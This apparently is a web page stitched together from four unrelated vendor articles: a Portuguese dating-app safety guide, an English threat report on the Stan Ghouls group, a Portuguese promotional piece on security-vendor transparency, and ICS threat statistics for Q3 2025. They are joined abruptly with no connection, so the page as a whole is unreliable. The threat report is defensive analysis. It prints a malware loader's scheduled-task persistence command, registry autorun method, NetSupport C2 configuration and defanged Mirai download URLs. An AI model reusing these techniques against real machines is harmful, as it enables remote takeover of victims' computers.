Quem não está pronto para se casar com um bot também não está tendo uma vida fácil: no mundo contemporâneo, as interações tête-à-tête estão diminuindo a cada ano. O amor moderno requer tecnologia moderna! E, embora as lamúrias sejam ainda bastante comuns: “Ah! Antigamente, as pessoas se apaixonavam de verdade. Mas, agora!? Todo mundo desliza para a esquerda e para a direita, e pronto!” As estatísticas contam uma história diferente. Aproximadamente 16% dos casais em todo o mundo dizem que se conheceram on-line e, em alguns países, esse número chega a 51%.

Dito isso, os aplicativos de namoro como o Tinder despertam algumas emoções seriamente confusas. A Internet está praticamente transbordando de artigos e vídeos alegando que esses aplicativos estão matando as possibilidades de romance e deixando todo mundo solitário. Mas o que a pesquisa realmente diz?

Em 2025, os cientistas conduziram uma meta-análise de estudos que investigou como os aplicativos de namoro afetam o bem-estar, a imagem corporal e a saúde mental dos usuários. Metade dos estudos se concentrou exclusivamente em homens, enquanto a outra metade incluiu homens e mulheres. Aqui estão os resultados: 86% dos entrevistados associaram a imagem corporal negativa ao uso de aplicativos de namoro! A análise também mostrou que, em quase um em cada dois casos, o uso de aplicativos de namoro se correlacionou com um declínio na saúde mental e no bem-estar geral.

Outros pesquisadores observaram que os níveis de depressão são mais baixos entre aqueles que evitam aplicativos de namoro. Por outro lado, os usuários que já lutaram contra a solidão ou a ansiedade geralmente desenvolvem uma dependência de namoro on-line. Eles não apenas entram no aplicativo com o objetivo de construir possíveis relacionamentos, como também para sentir as descargas de dopamina com as curtidas, correspondências e a rolagem interminável de perfis.

No entanto, o problema talvez não seja apenas os algoritmos; talvez isso tenha a ver com as nossas expectativas. Muita gente está convencida de que “a chama do amor” deve arder no primeiro encontro e que todo mundo tem uma “alma gêmea” esperando por eles em algum canto da cidade. Na realidade, esses ideais romantizados só surgiram durante a era romântica como uma refutação ao racionalismo iluminista, onde os casamentos de conveniência eram a norma absoluta.

Também vale a pena notar que a visão romântica do amor não surgiu do nada: os românticos, assim como muitos dos nossos contemporâneos, eram reticentes em relação ao rápido progresso tecnológico, à industrialização e à urbanização. Para eles, o “amor verdadeiro” parecia fundamentalmente incompatível com máquinas frias e cidades sufocadas pela poluição. Afinal, não é por acaso que Anna Karenina encontra seu fim sob as rodas de um trem.

De lá para cá, com todos os avanços tecnológicos em curso, muita gente sente que os algoritmos pressionam cada vez mais as nossas tomadas de decisão. No entanto, isso não significa que o namoro on-line é uma causa perdida. Os pesquisadores ainda precisam chegar a um consenso sobre até que ponto os relacionamentos oriundos da Internet são realmente duradouros ou bem-sucedidos. Conclusão: não entre em pânico, apenas mantenha sua rede digital segura!

Como manter a segurança no namoro on-line

Então, você decidiu hackear o cupido e se inscreveu em um aplicativo de namoro. O que poderia dar errado?

Deepfakes e catfishing

Catfishing é um golpe on-line clássico em que um golpista finge ser outra pessoa. Antigamente, esses golpistas apenas roubavam fotos e histórias de vida de pessoas reais, porém, hoje em dia, eles estão cada vez mais empenhados em aplicar golpes que usam modelos generativos. Algumas IAs conseguem produzir fotos incrivelmente realistas de pessoas que nem existem, e inventar uma história de fundo é moleza (ou deveríamos dizer, um prompt facilita as coisas). A propósito, aquele símbolo de “conta verificada” não oferece nenhuma garantia. Muitas vezes, a IA também consegue enganar os sistemas de verificação de identidade.

Para verificar se alguém está falando com uma pessoa real, é necessário solicitar uma videochamada ou fazer uma pesquisa reversa de imagens nas fotos dela. Se você quiser aprimorar suas habilidades de detecção, confira nossas três postagens sobre como detectar falsificações: desde fotos e gravações de áudio a vídeos deepfake em tempo real, como o tipo usado em bate-papos ao vivo por vídeo.

Phishing e golpes

Imagine o seguinte: você está se dando bem com uma nova conexão há algum tempo e, então, totalmente do nada, a pessoa manda um link suspeito e pede para você clicar nele. Talvez ela queira que você “a ajude a escolher os assentos” ou “compre ingressos para o cinema”. Mesmo que você tenha a sensação de que construiu um vínculo real, existe uma chance de que seu contato seja um golpista (ou apenas um bot) e de que esse link seja malicioso.

Dizer para si mesmo para “nunca clicar em um link malicioso” é um conselho bastante inútil, afinal, os links simplesmente chegam até nós sem nenhum tipo de aviso prévio. Em vez disso, tente fazer o seguinte: para garantir uma navegação segura, use uma solução de segurança robusta que bloqueia automaticamente as tentativas de phishing e impede o acesso a sites suspeitos.

É importante considerar que existe um esquema ainda mais sofisticado conhecido como “abate de porcos”. Nesses casos, o golpista pode conversar com a vítima por semanas ou até meses. Infelizmente, o final é bastante amargo: depois de engabelar a vítima com uma falsa sensação de segurança em um ambiente de brincadeiras amigáveis ou românticas, o golpista casualmente sugere que ela faça um “investimento em criptomoedas imperdível”, e depois desaparece juntamente com os fundos “investidos”.

Swatting e doxing

A Internet está cheia de histórias de horror sobre pessoas obsessivas, assédio e perseguição. É exatamente por isso que postar fotos que revelam onde você mora ou trabalha, ou ainda, fornecer detalhes para estranhos sobre seus pontos de encontro e locais favoritos, é uma roubada. Anteriormente, falamos sobre como evitar ser vítima de doxing, ou seja, a coleta e a divulgação pública das suas informações pessoais sem consentimento. O primeiro passo é bloquear as configurações de privacidade em todas as mídias sociais e aplicativos usando nossa ferramenta gratuita Privacy Checker.

Também recomendamos remover os metadados das suas fotos e vídeos antes da publicação ou envio. Muitos sites e aplicativos não fazem isso por você. Os metadados podem permitir que qualquer pessoa que baixe sua foto identifique as coordenadas exatas de onde ela foi tirada.

Por último, e não menos importante, não se esqueça da sua segurança física. Antes de sair para um encontro, uma precaução inteligente é compartilhar a geolocalização ao vivo e configurar uma palavra segura ou uma frase secreta com um amigo de confiança para mandar uma aviso se as coisas começarem a ficar estranhas.

Sextorsão e nudes

Não recomendamos enviar fotos íntimas para estranhos. Honestamente, não recomendamos essa prática nem mesmo com pessoas conhecidas, afinal de contas, nunca saberemos o que poderá dar errado ao longo do caminho. Mas, se uma conversa seguir para essa direção, sugira mudar para um aplicativo com criptografia de ponta a ponta que seja compatível com a autodestruição de mensagens, por exemplo, excluir após a visualização. Os bate-papos secretos do Telegram são ótimos para isso. Além disso, eles bloqueiam capturas de tela, assim como outros aplicativos de mensagens seguros. Se você vivenciar uma situação desconfortável, confira nossas postagens sobre o que fazer se você for vítima de sextorsão e como remover nudes vazados da Internet.

Mais sobre amor, segurança (e robôs):

• Nem flores nem presentes: como as mulheres são enganadas
• Golpes que visam pessoas apaixonadas ou solitárias
• A IA e a nova realidade da sextorsão
• Cinquenta tons de “sextorsão”
• Seu guia para namoro on-line seguro e privado

Introduction

Stan Ghouls (also known as Bloody Wolf) is an cybercriminal group that has been launching targeted attacks against organizations in Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. These attackers primarily have their sights set on the manufacturing, finance, and IT sectors. Their campaigns are meticulously prepared and tailored to specific victims, featuring a signature toolkit of custom Java-based malware loaders and a sprawling infrastructure with resources dedicated to specific campaigns.

We continuously track Stan Ghouls’ activity, providing our clients with intel on their tactics, techniques, procedures, and latest campaigns. In this post, we share the results of our most recent deep dive into a campaign targeting Uzbekistan, where we identified roughly 50 victims. About 10 devices in Russia were also hit, with a handful of others scattered across Kazakhstan, Turkey, Serbia, and Belarus (though those last three were likely just collateral damage).

During our investigation, we spotted shifts in the attackers’ infrastructure – specifically, a batch of new domains. We also uncovered evidence suggesting that Stan Ghouls may have added IoT-focused malware to their arsenal.

Technical details

Threat evolution

Stan Ghouls relies on phishing emails packed with malicious PDF attachments as their initial entry point. Historically, the group’s weapon of choice was the remote access Trojan (RAT) STRRAT, also known as Strigoi Master. Last year, however, they switched strategies, opting to misuse legitimate software, NetSupport, to maintain control over infected machines.

Given Stan Ghouls’ targeting of financial institutions, we believe their primary motive is financial gain. That said, their heavy use of RATs may also hint at cyberespionage.

Like any other organized cybercrime groups, Stan Ghouls frequently refreshes its infrastructure. To track their campaigns effectively, you have to continuously analyze their activity.

Initial infection vector

As we’ve mentioned, Stan Ghouls’ primary – and currently only – delivery method is spear phishing. Specifically, they favor emails loaded with malicious PDF attachments. This has been backed up by research from several of our industry peers (1, 2, 3). Interestingly, the attackers prefer to use local languages rather than opting for international mainstays like Russian or English. Below is an example of an email spotted in a previous campaign targeting users in Kyrgyzstan.

Example of a phishing email from a previous Stan Ghouls campaign

The email is written in Kyrgyz and translates to: “The service has contacted you. Materials for review are attached. Sincerely”.

The attachment was a malicious PDF file titled “Постановление_Районный_суд_Кчрм_3566_28-01-25_OL4_scan.pdf” (the title, written in Russian, posed it as an order of district court).

During the most recent campaign, which primarily targeted victims in Uzbekistan, the attackers deployed spear-phishing emails written in Uzbek:

Example of a spear-phishing email from the latest campaign

The email text can be translated as follows:

[redacted] AKMALZHON IBROHIMOVICH

You will receive a court notice. Application for retrial. The case is under review by the district court. Judicial Service.

Mustaqillik Street, 147 Uraboshi Village, Quva District.

The attachment, named E-SUD_705306256_ljro_varaqasi.pdf (MD5: 7556e2f5a8f7d7531f28508f718cb83d), is a standard one-page decoy PDF:

The embedded decoy document

Notice that the attackers claim that the “case materials” (which are actually the malicious loader) can only be opened using the Java Runtime Environment.

They even helpfully provide a link for the victim to download and install it from the official website.

The malicious loader

The decoy document contains identical text in both Russian and Uzbek, featuring two links that point to the malicious loader:

• Uzbek link (“- Ish materiallari 09.12.2025 y”): hxxps://mysoliq-uz[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/
• Russian link (“- Материалы дела 09.12.2025 г.”): hxxps://my-xb[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/

Both links lead to the exact same JAR file (MD5: 95db93454ec1d581311c832122d21b20).

It’s worth noting that these attackers are constantly updating their infrastructure, registering new domains for every new campaign. In the relatively short history of this threat, we’ve already mapped out over 35 domains tied to Stan Ghouls.

The malicious loader handles three main tasks:

1. Displaying a fake error message to trick the user into thinking the application can’t run. The message in the screenshot translates to: “This application cannot be run in your OS. Please use another device.”
   

   Fake error message

2. Checking that the number of previous RAT installation attempts is less than three. If the limit is reached, the loader terminates and throws the following error: “Urinishlar chegarasidan oshildi. Boshqa kompyuterni tekshiring.” This translates to: “Attempt limit reached. Try another computer.”
   

   The limitCheck procedure for verifying the number of RAT download attempts

3. Downloading a remote management utility from a malicious domain and saving it to the victim’s machine. Stan Ghouls loaders typically contain a list of several domains and will iterate through them until they find one that’s live.
   

   The performanceResourceUpdate procedure for downloading the remote management utility

The loader fetches the following files, which make up the components of the NetSupport RAT: PCICHEK.DLL, client32.exe, advpack.dll, msvcr100.dll, remcmdstub.exe, ir50_qcx.dll, client32.ini, AudioCapture.dll, kbdlk41a.dll, KBDSF.DLL, tcctl32.dll, HTCTL32.DLL, kbdibm02.DLL, kbd101c.DLL, kbd106n.dll, ir50_32.dll, nskbfltr.inf, NSM.lic, pcicapi.dll, PCICL32.dll, qwave.dll. This list is hardcoded in the malicious loader’s body. To ensure the download was successful, it checks for the presence of the client32.exe executable. If the file is found, the loader generates a NetSupport launch script (run.bat), drops it into the folder with the other files, and executes it:

The createBatAndRun procedure for creating and executing the run.bat file, which then launches the NetSupport RAT

The loader also ensures NetSupport persistence by adding it to startup using the following three methods:

1. It creates an autorun script named SoliqUZ_Run.bat and drops it into the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup):
   

   The generateAutorunScript procedure for creating the batch file and placing it in the Startup folder

2. It adds the run.bat file to the registry’s autorun key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malicious_key_name).
   

   The registryStartupAdd procedure for adding the RAT launch script to the registry autorun key

3. It creates a scheduled task to trigger run.bat using the following command:
   schtasks Create /TN "[malicious_task_name]" /TR "[path_to_run.bat]" /SC ONLOGON /RL LIMITED /F /RU "[%USERNAME%]"
   

   The installStartupTask procedure for creating a scheduled task to launch the NetSupport RAT (via run.bat)

Once the NetSupport RAT is downloaded, installed, and executed, the attackers gain total control over the victim’s machine. While we don’t have enough telemetry to say with 100% certainty what they do once they’re in, the heavy focus on finance-related organizations suggests that the group is primarily after its victims’ money. That said, we can’t rule out cyberespionage either.

Malicious utilities for targeting IoT infrastructure

Previous Stan Ghouls attacks targeting organizations in Kyrgyzstan, as documented by Group-IB researchers, featured a NetSupport RAT configuration file client32.ini with the MD5 hash cb9c28a4c6657ae5ea810020cb214ff0. While reports mention the Kyrgyzstan campaign kicked off in June 2025, Kaspersky solutions first flagged this exact config file on May 16, 2025. At that time, it contained the following NetSupport RAT command-and-control server info:

...
[HTTP]
CMPI=60
GatewayAddress=hgame33[.]com:443
GSK=FN:L?ADAFI:F?BCPGD;N>IAO9J>J@N
Port=443
SecondaryGateway=ravinads[.]com:443
SecondaryPort=443

At the time of our January 2026 investigation, our telemetry showed that the domain specified in that config, hgame33[.]com, was also hosting the following files:

• hxxp://www.hgame33[.]com/00101010101001/morte.spc
• hxxp://hgame33[.]com/00101010101001/debug
• hxxp://www.hgame33[.]com/00101010101001/morte.x86
• hxxp://www.hgame33[.]com/00101010101001/morte.mpsl
• hxxp://www.hgame33[.]com/00101010101001/morte.arm7
• hxxp://www.hgame33[.]com/00101010101001/morte.sh4
• hxxp://hgame33[.]com/00101010101001/morte.arm
• hxxp://hgame33[.]com/00101010101001/morte.i686
• hxxp://hgame33[.]com/00101010101001/morte.arc
• hxxp://hgame33[.]com/00101010101001/morte.arm5
• hxxp://hgame33[.]com/00101010101001/morte.arm6
• hxxp://www.hgame33[.]com/00101010101001/morte.m68k
• hxxp://www.hgame33[.]com/00101010101001/morte.ppc
• hxxp://www.hgame33[.]com/00101010101001/morte.x86_64
• hxxp://hgame33[.]com/00101010101001/morte.mips

All of these files belong to the infamous IoT malware named Mirai. Since they are sitting on a server tied to the Stan Ghouls’ campaign targeting Kyrgyzstan, we can hypothesize – with a low degree of confidence – that the group has expanded its toolkit to include IoT-based threats. However, it’s also possible it simply shared its infrastructure with other threat actors who were the ones actually wielding Mirai. This theory is backed up by the fact that the domain’s registration info was last updated on July 4, 2025, at 11:46:11 – well after Stan Ghouls’ activity in May and June.

Attribution

We attribute this campaign to the Stan Ghouls (Bloody Wolf) group with a high degree of confidence, based on the following similarities to the attackers’ previous campaigns:

1. Substantial code overlaps were found within the malicious loaders. For example:
   

   Code snippet from sample 1acd4592a4eb0c66642cc7b07213e9c9584c6140210779fbc9ebb76a90738d5e, the loader from the Group-IB report

   

   Code snippet from sample 95db93454ec1d581311c832122d21b20, the NetSupport loader described here

2. Decoy documents in both campaigns look identical.
   

   Decoy document 5d840b741d1061d51d9786f8009c37038c395c129bee608616740141f3b202bb from the campaign reported by Group-IB

   

   Decoy document 106911ba54f7e5e609c702504e69c89a used in the campaign described here

3. In both current and past campaigns, the attackers utilized loaders written in Java. Given that Java has fallen out of fashion with malicious loader authors in recent years, it serves as a distinct fingerprint for Stan Ghouls.

Victims

We identified approximately 50 victims of this campaign in Uzbekistan, alongside 10 in Russia and a handful of others in Kazakhstan, Turkey, Serbia, and Belarus (we suspect the infections in these last three countries were accidental). Nearly all phishing emails and decoy files in this campaign were written in Uzbek, which aligns with the group’s track record of leveraging the native languages of their target countries.

Most of the victims are tied to industrial manufacturing, finance, and IT. Furthermore, we observed infection attempts on devices within government organizations, logistics companies, medical facilities, and educational institutions.

It is worth noting that over 60 victims is quite a high headcount for a sophisticated campaign. This suggests the attackers have enough resources to maintain manual remote control over dozens of infected devices simultaneously.

Takeaways

In this post, we’ve broken down the recent campaign by the Stan Ghouls group. The attackers set their sights on organizations in industrial manufacturing, IT, and finance, primarily located in Uzbekistan. However, the ripple effect also reached Russia, Kazakhstan, and a few, likely accidental, victims elsewhere.

With over 60 targets hit, this is a remarkably high volume for a sophisticated targeted campaign. It points to the significant resources these actors are willing to pour into their operations. Interestingly, despite this, the group sticks to a familiar toolkit including the legitimate NetSupport remote management utility and their signature custom Java-based loader. The only thing they seem to keep updating is their infrastructure. For this specific campaign, they employed two new domains to house their malicious loader and one new domain dedicated to hosting NetSupport RAT files.

One curious discovery was the presence of Mirai files on a domain linked to the group’s previous campaigns. This might suggest Stan Ghouls are branching out into IoT malware, though it’s still too early to call it with total certainty.

We’re keeping a close watch on Stan Ghouls and will continue to keep our customers in the loop regarding the group’s latest moves. Kaspersky products provide robust protection against this threat at every stage of the attack lifecycle.

Indicators of compromise

* Additional IoCs and a YARA rule for detecting Stan Ghouls activity are available to customers of our Threat Intelligence Reporting service. For more details, contact us at crimewareintel@kaspersky.com.

PDF decoys

B4FF4AA3EBA9409F9F1A5210C95DC5C3
AF9321DDB4BEF0C3CD1FF3C7C786F0E2
056B75FE0D230E6FF53AC508E0F93CCB
DB84FEBFD85F1469C28B4ED70AC6A638
649C7CACDD545E30D015EDB9FCAB3A0C
BE0C87A83267F1CE13B3F75C78EAC295
78CB3ABD00A1975BEBEDA852B2450873
51703911DC437D4E3910CE7F866C970E
FA53B0FCEF08F8FF3FFDDFEE7F1F4F1A
79D0EEAFB30AA2BD4C261A51104F6ACC
8DA8F0339D17E2466B3D73236D18B835
299A7E3D6118AD91A9B6D37F94AC685B
62AFACC37B71D564D75A58FC161900C3
047A600E3AFBF4286175BADD4D88F131
ED0CCADA1FE1E13EF78553A48260D932
C363CD87178FD660C25CDD8D978685F6
61FF22BA4C3DF7AE4A936FCFDEB020EA
B51D9EDC1DC8B6200F260589A4300009
923557554730247D37E782DB3BEA365D
60C34AD7E1F183A973FB8EE29DC454E8
0CC80A24841401529EC9C6A845609775
0CE06C962E07E63D780E5C2777A661FC

Malicious loaders

1b740b17e53c4daeed45148bfbee4f14
3f99fed688c51977b122789a094fec2e
8b0bbe7dc960f7185c330baa3d9b214c
95db93454ec1d581311c832122d21b20
646a680856f837254e6e361857458e17
8064f7ac9a5aa845ded6a1100a1d5752
d0cf8946acd3d12df1e8ae4bb34f1a6e
db796d87acb7d980264fdcf5e94757f0
e3cb4dafa1fb596e1e34e4b139be1b05
e0023eb058b0c82585a7340b6ed4cc06
0bf01810201004dcc484b3396607a483
4C4FA06BD840405FBEC34FE49D759E8D
A539A07891A339479C596BABE3060EA6
b13f7ccbedfb71b0211c14afe0815b36
f14275f8f420afd0f9a62f3992860d68
3f41091afd6256701dd70ac20c1c79fe
5c4a57e2e40049f8e8a6a74aa8085c80
7e8feb501885eff246d4cb43c468b411
8aa104e64b00b049264dc1b01412e6d9
8c63818261735ddff2fe98b3ae23bf7d

Malicious domains

mysoliq-uz[.]com
my-xb[.]com
xarid-uz[.]com
ach-uz[.]com
soliq-uz[.]com
minjust-kg[.]com
esf-kg[.]com
taxnotice-kg[.]com
notice-kg[.]com
proauditkg[.]com
kgauditcheck[.]com
servicedoc-kg[.]com
auditnotice-kg[.]com
tax-kg[.]com
rouming-uz[.]com
audit-kg[.]com
kyrgyzstanreview[.]com
salyk-notofocations[.]com

A rotina de um líder moderno em segurança da informação (o CISO – Chief Information Security Officer) vai muito além de apenas enfrentar hackers. É também uma jornada contínua conhecida como “compliance”. Os reguladores seguem apertando o cerco; a todo momento surgem novos padrões e as dores de cabeça só aumentam. Além disso, os CISOs são responsáveis ​​não apenas pelo seu próprio perímetro, mas também pelo que acontece fora dele: toda a sua cadeia de suprimentos, todos os seus contratados e toda a complexa variedade de softwares que seus processos de negócios utilizam. Embora a lógica por trás disso seja sólida, ela também é implacável: se uma falha for encontrada no seu fornecedor e recair sobre você, consequentemente, você quem será responsabilizado. Essa lógica também se aplica ao software de segurança.

Antigamente, as empresas raramente pensavam no que realmente havia dentro das soluções e produtos de segurança que utilizavam. Agora, no entanto, as empresas, especialmente as grandes, querem saber tudo: o que realmente tem dentro da caixa? Quem escreveu o código? Isso vai comprometer alguma função crítica ou até mesmo derrubar tudo? (Já vimos precedentes assim; por exemplo: o incidente de atualização do Crowdstrike 2024.) Onde e como os dados são processados? E essas são as perguntas certas a serem feitas.

O problema está no fato de que quase todos os clientes confiam em seus fornecedores para responder com precisão a essas perguntas; muitas vezes porque não têm outra opção. Uma abordagem mais madura na realidade cibernética de hoje é a verificação.

Em termos corporativos, isso é chamado de confiança na cadeia de suprimentos, e tentar resolver esse quebra-cabeça por conta própria é uma grande dor de cabeça. Você precisa da ajuda de fornecedores. Um fornecedor responsável está pronto para mostrar o que há por trás de suas soluções, abrir o código-fonte para a análise de parceiros e clientes e, em geral, conquistar a confiança não com belos slides, mas com etapas sólidas e práticas.

Então, quem já está fazendo isso e quem ainda está preso ao passado? Um estudo recente e detalhado de nossos colegas na Europa tem a resposta. Conduzido pelo respeitado laboratório de testes AV-Comparatives, pela Câmara de Comércio do Tirol (WKO), pela MCI Entrepreneurial School e pelo escritório de advocacia Studio Legale Tremolada.

A principal conclusão do estudo é que a era das “caixas-pretas” na cibersegurança chegou ao fim. Descanse em paz. Amém. O futuro pertence àqueles que não escondem seu código-fonte e relatórios de vulnerabilidades, e que oferecem aos clientes a máxima liberdade de escolha na configuração de seus produtos. E o relatório indica claramente quem não apenas promete, mas de fato cumpre. Adivinhe quem!

Excelente palpite! Sim, somos nós!

Oferecemos aos nossos clientes algo que, infelizmente, ainda é uma espécie rara e em extinção no setor: centros de transparência, revisões do código-fonte de nossos produtos, uma lista detalhada de materiais de software (SBOM) e a capacidade de verificar o histórico de atualizações e controlar as implementações. E, claro, oferecemos tudo o que já se tornou padrão no setor. Você pode consultar todos os detalhes no relatório completo de “Transparência e Responsabilidade em Cibersegurança” (TRACS) ou em nosso resumo. A seguir, abordaremos alguns dos trechos mais interessantes.

Critérios claros, sem misturar conceitos

A TRACS analisou 14 fornecedores populares e seus produtos de EPP/EDR, desde Bitdefender e CrowdStrike até Kaspersky Next EDR Optimum e WithSecure. O objetivo foi identificar quais fornecedores não apenas dizem “confie em nós”, mas realmente permitem que você verifique tudo o que prometem. O estudo abrangeu 60 critérios: da conformidade com o GDPR (Regulamento Geral de Proteção de Dados; afinal, trata-se de um estudo europeu) e auditorias de ISO 27001 à capacidade de processar toda a telemetria localmente e acessar o código-fonte de um produto. Mas os autores decidiram não atribuir pontos para cada categoria nem formar uma única classificação geral.

Por quê? Porque todos têm modelos de ameaças e riscos diferentes. O que é um recurso para um, pode ser um bug e um desastre para outro. Instale atualizações de forma rápida e totalmente automática. Para uma pequena empresa ou uma rede varejista com milhares de pequenas filiais independentes, isso é uma bênção: simplesmente não haveria equipe de TI suficiente para gerenciar tudo isso manualmente. Mas, em uma fábrica onde um computador controla a esteira de produção, isso seria totalmente inaceitável. Uma atualização defeituosa pode paralisar completamente uma linha de produção, um impacto nos negócios que pode ser fatal (ou, no mínimo, pior do que o recente ataque cibernético à Jaguar Land Rover). Nesse cenário, cada atualização precisa ser testada antes de entrar em operação. Com a telemetria, a história é a mesma. Uma agência de relações públicas envia dados dos seus computadores para a nuvem do fornecedor para participar da detecção de ameaças cibernéticas e receber proteção de forma imediata. Perfeito. Mas e uma empresa que processa registros médicos de pacientes ou projetos técnicos altamente confidenciais em seus computadores? Nesse caso, as configurações de telemetria precisariam ser cuidadosamente reavaliadas.

O ideal é que cada empresa atribua “pesos” a cada critério e calcule sua própria “nota de compatibilidade” com os fornecedores de EDR/EPP. Mas uma coisa é óbvia: quem oferece opções aos clientes, sai na frente.

Veja, por exemplo, a análise de reputação de arquivos suspeitos. Ela pode funcionar de duas formas: por meio da nuvem compartilhada do fornecedor ou de uma micronuvem privada dentro de uma única organização. Além disso, há a opção de desativar totalmente essa análise e trabalhar de forma completamente off-line. Pouquíssimos fornecedores oferecem aos clientes essas três opções. Por exemplo, a análise de reputação no local está disponível em apenas oito fornecedores avaliados no teste. Nem é preciso dizer que somos um deles.

Elevando o padrão

Em todas as categorias avaliadas no teste, a situação é praticamente a mesma observada no serviço de reputação. Analisando cuidadosamente as 45 páginas do relatório: constatamos que estamos à frente de nossos concorrentes ou entre os líderes. E podemos afirmar com orgulho que, em cerca de um terço das categorias comparativas, oferecemos capacidades significativamente superiores às da maioria dos nossos pares. Veja você mesmo:

Visitar um centro de transparência e revisar o código-fonte? Verificar se os binários do produto são realmente criados a partir desse código-fonte? Apenas três fornecedores avaliados no teste oferecem isso. E, no caso de um deles, essas opções só estão disponíveis para clientes governamentais. Nossos centros de transparência são os mais numerosos e geograficamente distribuídos do mercado, e oferecem aos clientes a mais ampla variedade de opções.

A inauguração do nosso primeiro centro de transparência em 2018

Baixar atualizações do banco de dados e verificá-las novamente? Apenas seis fornecedores (incluindo nós) oferecem isso.

Configurar a implementação de atualizações em múltiplas etapas? Não é exatamente algo raro, mas também está longe de ser comum, apenas sete fornecedores, além de nós, oferecem esse recurso.

Ter acesso aos resultados de uma auditoria de segurança externa da empresa? Apenas nós e outros seis fornecedores estão preparados para compartilhar isso com os clientes.

Desmembrar a cadeia de suprimentos em elos individuais por meio de um SBOM? Isso também é raro: apenas três fornecedores permitem solicitar um SBOM. E um deles é aquela empresa de cor verde que, por coincidência nada aleatória, leva o meu nome.

É claro que há categorias em que todos se saem bem: todos foram aprovados em auditorias ISO/IEC 27001, estão em conformidade com o GDPR, seguem práticas de desenvolvimento seguro e aceitam relatórios de vulnerabilidades.

Por fim, há ainda a questão dos indicadores técnicos. Todos os produtos que funcionam on-line enviam determinados dados técnicos sobre os computadores protegidos, além de informações relacionadas a arquivos infectados. Para muitas empresas, isso não é um problema, pelo contrário, elas ficam satisfeitas por melhorar a eficácia da proteção. Mas, para organizações que estão realmente focadas em minimizar o fluxo de dados, a AV-Comparatives também mede isso; e por acaso, somos o fornecedor que coleta o menor volume de telemetria em comparação com os demais.

Conclusões práticas

Graças aos especialistas austríacos, os CISOs e suas equipes agora têm uma tarefa muito mais simples ao verificar seus fornecedores de segurança. E não apenas os 14 que foram testados. A mesma estrutura pode ser aplicada a outros fornecedores de soluções de segurança e a softwares em geral. Mas também há conclusões estratégicas.

A transparência facilita o gerenciamento de riscos. Se você é responsável por manter um negócio em operação, não vai querer ficar na dúvida se sua ferramenta de proteção se tornará seu ponto fraco. Você precisa de previsibilidade e responsabilidade. O estudo da WKO e da AV-Comparatives confirma que o nosso modelo reduz esses riscos e os torna gerenciáveis.

Evidências no lugar de slogans. Nesse mercado, não basta simplesmente escrever “somos seguros” no seu site. É preciso ter mecanismos de auditoria. O cliente precisa ter a possibilidade de verificar tudo por conta própria. Nós fornecemos isso. Os outros ainda estão se adaptando.

Transparência e maturidade caminham juntas. Fornecedores que são transparentes com seus clientes normalmente também contam com processos mais maduros de desenvolvimento de produto, resposta a incidentes e tratamento de vulnerabilidades. Seus produtos e serviços são mais confiáveis.

Nossa abordagem à transparência (GTI) funciona. Quando anunciamos nossa iniciativa, anos atrás, e inauguramos Centros de Transparência ao redor do mundo, ouvimos todo tipo de crítica; que era um desperdício de dinheiro e que ninguém realmente precisava disso. Agora, especialistas europeus independentes afirmam que é exatamente assim que um fornecedor deve operar em 2025, e no futuro.

Foi um verdadeiro prazer ler este relatório. Não apenas porque ele nos elogia, mas porque o setor finalmente está caminhando na direção certa, rumo à transparência e à responsabilidade.

Iniciamos esta tendência, seguimos na liderança e vamos continuar desbravando esse caminho. Portanto, caros leitores e usuários, não se esqueçam: confiar é uma coisa, poder verificar tudo, de forma completa, é outra bem diferente.

Statistics across all threats

In Q3 2025, the percentage of ICS computers on which malicious objects were blocked decreased from the previous quarter by 0.4 pp to 20.1%. This is the lowest level for the observed period.

Percentage of ICS computers on which malicious objects were blocked, Q3 2022–Q3 2025

Regionally, the percentage of ICS computers on which malicious objects were blocked ranged from 9.2% in Northern Europe to 27.4% in Africa.

Regions ranked by percentage of ICS computers on which malicious objects were blocked

In Q3 2025, the percentage increased in five regions. The most notable increase occurred in East Asia, triggered by the local spread of malicious scripts in the OT infrastructure of engineering organizations and ICS integrators.

Changes in the percentage of ICS computers on which malicious objects were blocked, Q3 2025

Selected industries

The biometrics sector traditionally led the rankings of the industries and OT infrastructures surveyed in this report in terms of the percentage of ICS computers on which malicious objects were blocked.

Rankings of industries and OT infrastructures by percentage of ICS computers on which malicious objects were blocked

In Q3 2025, the percentage of ICS computers on which malicious objects were blocked increased in four of the seven surveyed industries. The most notable increases were in engineering and ICS integrators, and manufacturing.

Percentage of ICS computers on which malicious objects were blocked in selected industries

Diversity of detected malicious objects

In Q3 2025, Kaspersky protection solutions blocked malware from 11,356 different malware families of various categories on industrial automation systems.

Percentage of ICS computers on which the activity of malicious objects of various categories was blocked

In Q3 2025, there was a decrease in the percentage of ICS computers on which denylisted internet resources and miners of both categories were blocked. These were the only categories that exhibited a decrease.

Main threat sources

Depending on the threat detection and blocking scenario, it is not always possible to reliably identify the source. The circumstantial evidence for a specific source can be the blocked threat’s type (category).

The internet (visiting malicious or compromised internet resources; malicious content distributed via messengers; cloud data storage and processing services and CDNs), email clients (phishing emails), and removable storage devices remain the primary sources of threats to computers in an organization’s technology infrastructure.

In Q3 2025, the percentage of ICS computers on which malicious objects from various sources were blocked decreased.

Percentage of ICS computers on which malicious objects from various sources were blocked

The same computer can be attacked by several categories of malware from the same source during a quarter. That computer is counted when calculating the percentage of attacked computers for each threat category, but is only counted once for the threat source (we count unique attacked computers). In addition, it is not always possible to accurately determine the initial infection attempt. Therefore, the total percentage of ICS computers on which various categories of threats from a certain source were blocked can exceed the percentage of threats from the source itself.

• The main categories of threats from the internet blocked on ICS computers in Q3 2025 were malicious scripts and phishing pages, and denylisted internet resources. The percentage ranged from 4.57% in Northern Europe to 10.31% in Africa.
• The main categories of threats from email clients blocked on ICS computers were malicious scripts and phishing pages, spyware, and malicious documents. Most of the spyware detected in phishing emails was delivered as a password-protected archive or a multi-layered script embedded in an office document. The percentage of ICS computers on which threats from email clients were blocked ranged from 0.78% in Russia to 6.85% in Southern Europe.
• The main categories of threats that were blocked when removable media was connected to ICS computers were worms, viruses, and spyware. The percentage of ICS computers on which threats from this source were blocked ranged from 0.05% in Australia and New Zealand to 1.43% in Africa.
